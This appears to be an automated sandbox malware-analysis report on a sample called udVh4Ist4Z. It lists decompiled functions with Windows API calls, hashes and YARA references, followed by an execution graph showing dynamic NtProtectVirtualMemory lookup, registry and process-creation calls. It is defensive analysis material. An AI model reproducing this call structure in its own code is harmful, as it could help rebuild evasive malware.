                                                                                        Function 02D6AA0C Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(?,00000000,02D6AAA3,?,?,00000000), ref: 02D6AA24
                                                                                          • Part of subcall function 02D6A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D6A79E
                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02D6AAA3,?,?,00000000), ref: 02D6AA54
                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000004), ref: 02D6AA5F
                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02D6AAA3,?,?,00000000), ref: 02D6AA7D
                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A994,00000000,00000000,00000003), ref: 02D6AA88
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                        • String ID:
                                                                                        • API String ID: 4102113445-0
                                                                                        • Opcode ID: 313c7470a3e7dd6f8acca1425ee0b9e9149b472610aa057c650e450d782fe718
                                                                                        • Instruction ID: 68b02ec2e1c4c2fa7cecc05b8ab80174712e16d2d3c800203acd8fed4888bf69
                                                                                        • Opcode Fuzzy Hash: 313c7470a3e7dd6f8acca1425ee0b9e9149b472610aa057c650e450d782fe718
                                                                                        • Instruction Fuzzy Hash: F6012B712042847FF311AB74DD1AF7E769EDB46720FA10162F540B67C0D669DE008AF4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D89D78 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 332threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 02D6352C: GetKeyboardType.USER32(00000000), ref: 02D63531
                                                                                          • Part of subcall function 02D6352C: GetKeyboardType.USER32(00000001), ref: 02D6353D
                                                                                        • GetCommandLineA.KERNEL32(2C02D9C5), ref: 02D8A06C
                                                                                        • GetACP.KERNEL32(2C02D9C5), ref: 02D8A080
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02D8A08A
                                                                                          • Part of subcall function 02D6355C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D6357E
                                                                                          • Part of subcall function 02D6355C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02D635CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D635B1
                                                                                          • Part of subcall function 02D6355C: RegCloseKey.ADVAPI32(?,02D635D4,00000000,?,00000004,00000000,02D635CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D635C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                        • String ID: p'h
                                                                                        • API String ID: 3316616684-840755789
                                                                                        • Opcode ID: b71207c3504044560510f12dac7a7992f7fcffa95691f3d5fe7d00cc210101bb
                                                                                        • Instruction ID: 362a9b053f83a4937f0558b41e2b5913ded7d9eaabede7dae291f2e366befe95
                                                                                        • Opcode Fuzzy Hash: b71207c3504044560510f12dac7a7992f7fcffa95691f3d5fe7d00cc210101bb
                                                                                        • Instruction Fuzzy Hash: 7641D86044E3C24FD703AB7458691A43FB09E17214B2E49DBC9C0DF2B7D6285C2BEB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6AABC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(?,00000000,02D6AC8C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02D6AAEB
                                                                                          • Part of subcall function 02D6A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D6A79E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Locale$InfoThread
                                                                                        • String ID: eeee$ggg$yyyy
                                                                                        • API String ID: 4232894706-1253427255
                                                                                        • Opcode ID: 375722186085bd86b9f5bcba328b029ba8a1169cc7909cd7b917a3d7462f0cc6
                                                                                        • Instruction ID: 11a059726fe4fd503635434b64b348868d33f19c6ba0e05dbf59ba535d971281
                                                                                        • Opcode Fuzzy Hash: 375722186085bd86b9f5bcba328b029ba8a1169cc7909cd7b917a3d7462f0cc6
                                                                                        • Instruction Fuzzy Hash: EE41E0387041064BCB21EBB9899C2BEB3EBEB86300F654566D4C2E7344DA34ED06DA71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D779FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02D77A09
                                                                                        • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D77A0F
                                                                                        Strings
                                                                                        • NtProtectVirtualMemory, xrefs: 02D779FF
                                                                                        • C:\Windows\System32\ntdll.dll, xrefs: 02D77A04
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                        • API String ID: 1646373207-1386159242
                                                                                        • Opcode ID: 9db151ce22a8e09c651650d6c8db568906e2e42c68f0997337647f3354affbf7
                                                                                        • Instruction ID: 2778fb2c762e395a459ea7632e72a8af46f2daa641a7edb77117c2145b871f62
                                                                                        • Opcode Fuzzy Hash: 9db151ce22a8e09c651650d6c8db568906e2e42c68f0997337647f3354affbf7
                                                                                        • Instruction Fuzzy Hash: 95E0BFB555024E7FAB40DEE8EC45D9B77DCAB19200B404401BA19E7301D674ED119FB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6C430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,02D8A10B,00000000,02D8A11E), ref: 02D6C436
                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02D6C447
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                        • API String ID: 1646373207-3712701948
                                                                                        • Opcode ID: a390035fb44ad071c194f8ded2e4b4f44d78d47e05acd896fc85b16e2343f1f6
                                                                                        • Instruction ID: 4323a719c09403185257ced2b2cef232b73fafa37c2b99b5c0efd441036fce6a
                                                                                        • Opcode Fuzzy Hash: a390035fb44ad071c194f8ded2e4b4f44d78d47e05acd896fc85b16e2343f1f6
                                                                                        • Instruction Fuzzy Hash: 16D05E60AB03455FFB00EAB2788C63523ECC305709F00882BE04195700D6A5EC188FA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6E1A4 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D6E253
                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D6E26F
                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D6E2E6
                                                                                        • VariantClear.OLEAUT32(?), ref: 02D6E30F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                        • String ID:
                                                                                        • API String ID: 920484758-0
                                                                                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                        • Instruction ID: 65a06a19f248be394a0b4e79be780db20574f56adc34e67976ba97a1fe3d0926
                                                                                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                        • Instruction Fuzzy Hash: 7441E779A002199FCB61DB58C898FE9B7BEEB4C604F0081D5E648A7351DB34AF818F60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6ACF8 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D6AD15
                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D6AD39
                                                                                        • GetModuleFileNameA.KERNEL32(02D60000,?,00000105), ref: 02D6AD54
                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D6ADEA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3990497365-0
                                                                                        • Opcode ID: 8dfe3735e2f989689cd475c7cd7a1c29fd939658e03f5c6c09a8ef5701d1f88a
                                                                                        • Instruction ID: dff9fed9fde4a0c4fe68bd2dbca181ed8a30c9ba7566e848810008780a242aa8
                                                                                        • Opcode Fuzzy Hash: 8dfe3735e2f989689cd475c7cd7a1c29fd939658e03f5c6c09a8ef5701d1f88a
                                                                                        • Instruction Fuzzy Hash: 00412C71A402599BDB21DB68CC88BEAB7FDEB08301F4044E5A548E7351EB749F84CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6ACF6 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D6AD15
                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D6AD39
                                                                                        • GetModuleFileNameA.KERNEL32(02D60000,?,00000105), ref: 02D6AD54
                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D6ADEA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3990497365-0
                                                                                        • Opcode ID: 9c25985fe05d716be20f5fb9f0e164be166ef1d422859df989e0a3cd80c97b61
                                                                                        • Instruction ID: 96b54bbb8cb5b034dfd6ec13300ad9aaf372acd316d8889b464131fc799bc3b0
                                                                                        • Opcode Fuzzy Hash: 9c25985fe05d716be20f5fb9f0e164be166ef1d422859df989e0a3cd80c97b61
                                                                                        • Instruction Fuzzy Hash: EE412C70A402589BDB21DB68CC88BEAB7EDEB08301F4040E5A548E7351EB749F88CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D61C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2cb8f47092eb36538797c7f5b7103818dd7cdf1f9f82e4e329f41d2ff6d914d9
                                                                                        • Instruction ID: 6c00efc4ea11a1b3ac80a64d56d52b77b51086f4921d7abd5b31543bf310a23c
                                                                                        • Opcode Fuzzy Hash: 2cb8f47092eb36538797c7f5b7103818dd7cdf1f9f82e4e329f41d2ff6d914d9
                                                                                        • Instruction Fuzzy Hash: E6A1C1A67106010BD718AA7C9C893BDB3C2DBC4325F28827EE51DCB3C5EB68CD56C660
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D694A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02D69596), ref: 02D6952E
                                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02D69596), ref: 02D69534
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DateFormatLocaleThread
                                                                                        • String ID: yyyy
                                                                                        • API String ID: 3303714858-3145165042
                                                                                        • Opcode ID: a0da6e99c7831421ddfbc4d9a48fedf80eb6e91045dfda723a6a4530aed8ea4f
                                                                                        • Instruction ID: eacf0917b9742c22dddf3cc92d3d572112be156143d34ae7cf6fca1e2e14ab71
                                                                                        • Opcode Fuzzy Hash: a0da6e99c7831421ddfbc4d9a48fedf80eb6e91045dfda723a6a4530aed8ea4f
                                                                                        • Instruction Fuzzy Hash: D4217171A012189BDB21DFA4D955AFEB3F9EF48710F5100A6E905E7340E730DE44CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6645C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocValue
                                                                                        • String ID: i
                                                                                        • API String ID: 1189806713-1314162127
                                                                                        • Opcode ID: 85d8edb3d2651fbc26113ee1f7d463b61cca02f0f8c1cfe77f0a71bf15516822
                                                                                        • Instruction ID: d6be20cd1196c4d91146da4b5c064e1efa89aafb59d5a7fc74ddc86aae44c6d6
                                                                                        • Opcode Fuzzy Hash: 85d8edb3d2651fbc26113ee1f7d463b61cca02f0f8c1cfe77f0a71bf15516822
                                                                                        • Instruction Fuzzy Hash: 8DC002A0D647829BEF00BBB6A94862927ADEB05345F084926A450C774ADB3CDC14DFB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D79F9C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02D79FD0
                                                                                        • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 02D7A000
                                                                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 02D7A01F
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 02D7A02B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Read$Write
                                                                                        • String ID:
                                                                                        • API String ID: 3448952669-0
                                                                                        • Opcode ID: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                        • Instruction ID: 83162dab7a287d875fa94fc16a8682865bace0bfaa8ca9eed1ca2a46415d2e0f
                                                                                        • Opcode Fuzzy Hash: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                        • Instruction Fuzzy Hash: 0321A27164021AABDB10CF69CC80BAEB3A9EF84351F148955EE1097388E73CEC11CAA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:2%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:28.8%
                                                                                        Total number of Nodes:744
                                                                                        Total number of Limit Nodes:23
                                                                                        execution_graph 46917 434887 46918 434893 CallCatchBlock 46917->46918 46944 434596 46918->46944 46920 43489a 46922 4348c3 46920->46922 47232 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46920->47232 46929 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46922->46929 47233 444251 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46922->47233 46924 4348dc 46926 4348e2 CallCatchBlock 46924->46926 47234 4441f5 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46924->47234 46927 434962 46955 434b14 46927->46955 46929->46927 47235 4433e7 35 API calls 6 library calls 46929->47235 46937 434984 46938 43498e 46937->46938 47237 44341f 28 API calls _Atexit 46937->47237 46940 434997 46938->46940 47238 4433c2 28 API calls _Atexit 46938->47238 47239 43470d 13 API calls 2 library calls 46940->47239 46943 43499f 46943->46926 46945 43459f 46944->46945 47240 434c52 IsProcessorFeaturePresent 46945->47240 46947 4345ab 47241 438f31 10 API calls 4 library calls 46947->47241 46949 4345b0 46954 4345b4 46949->46954 47242 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46949->47242 46951 4345bd 46952 4345cb 46951->46952 47243 438f5a 8 API calls 3 library calls 46951->47243 46952->46920 46954->46920 47244 436e90 46955->47244 46958 434968 46959 4441a2 46958->46959 47246 44f059 46959->47246 46961 4441ab 46962 434971 46961->46962 47250 446815 35 API calls 46961->47250 46964 40e9c5 46962->46964 47252 41cb50 LoadLibraryA GetProcAddress 46964->47252 46966 40e9e1 GetModuleFileNameW 47257 40f3c3 46966->47257 46968 40e9fd 47272 4020f6 46968->47272 46971 4020f6 28 API calls 46972 40ea1b 46971->46972 47278 41be1b 46972->47278 46976 40ea2d 47304 401e8d 46976->47304 46978 40ea36 46979 40ea93 46978->46979 46980 40ea49 46978->46980 47310 401e65 46979->47310 47509 40fbb3 116 API calls 46980->47509 46983 40ea5b 46985 401e65 22 API calls 46983->46985 46984 40eaa3 46987 401e65 22 API calls 46984->46987 46986 40ea67 46985->46986 47510 410f37 36 API calls __EH_prolog 46986->47510 46988 40eac2 46987->46988 47315 40531e 46988->47315 46991 40ead1 47320 406383 46991->47320 46992 40ea79 47511 40fb64 77 API calls 46992->47511 46996 40ea82 47512 40f3b0 70 API calls 46996->47512 47002 401fd8 11 API calls 47004 40eefb 47002->47004 47003 401fd8 11 API calls 47005 40eafb 47003->47005 47236 4432f6 GetModuleHandleW 47004->47236 47006 401e65 22 API calls 47005->47006 47007 40eb04 47006->47007 47337 401fc0 47007->47337 47009 40eb0f 47010 401e65 22 API calls 47009->47010 47011 40eb28 47010->47011 47012 401e65 22 API calls 47011->47012 47013 40eb43 47012->47013 47014 40ebae 47013->47014 47513 406c1e 28 API calls 47013->47513 47015 401e65 22 API calls 47014->47015 47022 40ebbb 47015->47022 47017 40eb70 47018 401fe2 28 API calls 47017->47018 47019 40eb7c 47018->47019 47020 401fd8 11 API calls 47019->47020 47023 40eb85 47020->47023 47021 40ec02 47341 40d069 47021->47341 47022->47021 47027 413549 3 API calls 47022->47027 47514 413549 RegOpenKeyExA 47023->47514 47025 40ec08 47026 40ea8b 47025->47026 47344 41b2c3 47025->47344 47026->47002 47033 40ebe6 47027->47033 47031 40f34f 47546 4139a9 30 API calls 47031->47546 47032 40ec23 47035 40ec76 47032->47035 47361 407716 47032->47361 47033->47021 47517 4139a9 30 API calls 47033->47517 47036 401e65 22 API calls 47035->47036 47039 40ec7f 47036->47039 47047 40ec90 47039->47047 47048 40ec8b 47039->47048 47041 40f365 47547 412475 65 API calls ___scrt_fastfail 47041->47547 47042 40ec42 47518 407738 30 API calls 47042->47518 47043 40ec4c 47046 401e65 22 API calls 47043->47046 47057 40ec55 47046->47057 47053 401e65 22 API calls 47047->47053 47521 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47048->47521 47049 40ec47 47519 407260 97 API calls 47049->47519 47050 41bc5e 28 API calls 47054 40f37f 47050->47054 47055 40ec99 47053->47055 47548 413a23 RegOpenKeyExW RegDeleteValueW 47054->47548 47365 41bc5e 47055->47365 47057->47035 47060 40ec71 47057->47060 47059 40eca4 47369 401f13 47059->47369 47520 407260 97 API calls 47060->47520 47061 40f392 47065 401f09 11 API calls 47061->47065 47067 40f39c 47065->47067 47069 401f09 11 API calls 47067->47069 47071 40f3a5 47069->47071 47070 401e65 22 API calls 47072 40ecc1 47070->47072 47549 40dd42 27 API calls 47071->47549 47076 401e65 22 API calls 47072->47076 47074 40f3aa 47550 414f2a 169 API calls _strftime 47074->47550 47078 40ecdb 47076->47078 47079 401e65 22 API calls 47078->47079 47080 40ecf5 47079->47080 47081 401e65 22 API calls 47080->47081 47083 40ed0e 47081->47083 47082 40ed7b 47085 40ed8a 47082->47085 47090 40ef06 ___scrt_fastfail 47082->47090 47083->47082 47084 401e65 22 API calls 47083->47084 47088 40ed23 _wcslen 47084->47088 47086 401e65 22 API calls 47085->47086 47092 40ee0f 47085->47092 47087 40ed9c 47086->47087 47089 401e65 22 API calls 47087->47089 47088->47082 47093 401e65 22 API calls 47088->47093 47091 40edae 47089->47091 47524 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47090->47524 47096 401e65 22 API calls 47091->47096 47114 40ee0a ___scrt_fastfail 47092->47114 47094 40ed3e 47093->47094 47098 401e65 22 API calls 47094->47098 47097 40edc0 47096->47097 47101 401e65 22 API calls 47097->47101 47099 40ed53 47098->47099 47381 40da34 47099->47381 47100 40ef51 47102 401e65 22 API calls 47100->47102 47104 40ede9 47101->47104 47105 40ef76 47102->47105 47110 401e65 22 API calls 47104->47110 47525 402093 47105->47525 47107 401f13 28 API calls 47109 40ed72 47107->47109 47112 401f09 11 API calls 47109->47112 47113 40edfa 47110->47113 47111 40ef88 47531 41376f 14 API calls 47111->47531 47112->47082 47439 40cdf9 47113->47439 47114->47092 47522 413947 31 API calls 47114->47522 47118 40ef9e 47120 401e65 22 API calls 47118->47120 47119 40eea3 ctype 47122 401e65 22 API calls 47119->47122 47121 40efaa 47120->47121 47532 43baac 39 API calls _strftime 47121->47532 47125 40eeba 47122->47125 47124 40efb7 47126 40efe4 47124->47126 47533 41cd9b 87 API calls ___scrt_fastfail 47124->47533 47125->47100 47127 401e65 22 API calls 47125->47127 47130 402093 28 API calls 47126->47130 47128 40eed7 47127->47128 47131 41bc5e 28 API calls 47128->47131 47133 40eff9 47130->47133 47134 40eee3 47131->47134 47132 40efc8 CreateThread 47132->47126 47811 41d45d 10 API calls 47132->47811 47135 402093 28 API calls 47133->47135 47523 40f474 106 API calls 47134->47523 47137 40f008 47135->47137 47534 41b4ef 79 API calls 47137->47534 47138 40eee8 47138->47100 47140 40eeef 47138->47140 47140->47026 47141 40f00d 47142 401e65 22 API calls 47141->47142 47143 40f019 47142->47143 47144 401e65 22 API calls 47143->47144 47145 40f02b 47144->47145 47146 401e65 22 API calls 47145->47146 47147 40f04b 47146->47147 47535 43baac 39 API calls _strftime 47147->47535 47149 40f058 47150 401e65 22 API calls 47149->47150 47151 40f063 47150->47151 47152 401e65 22 API calls 47151->47152 47153 40f074 47152->47153 47154 401e65 22 API calls 47153->47154 47155 40f089 47154->47155 47156 401e65 22 API calls 47155->47156 47157 40f09a 47156->47157 47158 40f0a1 StrToIntA 47157->47158 47536 409de4 170 API calls _wcslen 47158->47536 47160 40f0b3 47161 401e65 22 API calls 47160->47161 47163 40f0bc 47161->47163 47162 40f101 47166 401e65 22 API calls 47162->47166 47163->47162 47537 4344ea 22 API calls 3 library calls 47163->47537 47165 40f0d1 47167 401e65 22 API calls 47165->47167 47171 40f111 47166->47171 47168 40f0e4 47167->47168 47169 40f0eb CreateThread 47168->47169 47169->47162 47805 419fb4 109 API calls 2 library calls 47169->47805 47170 40f159 47172 401e65 22 API calls 47170->47172 47171->47170 47538 4344ea 22 API calls 3 library calls 47171->47538 47178 40f162 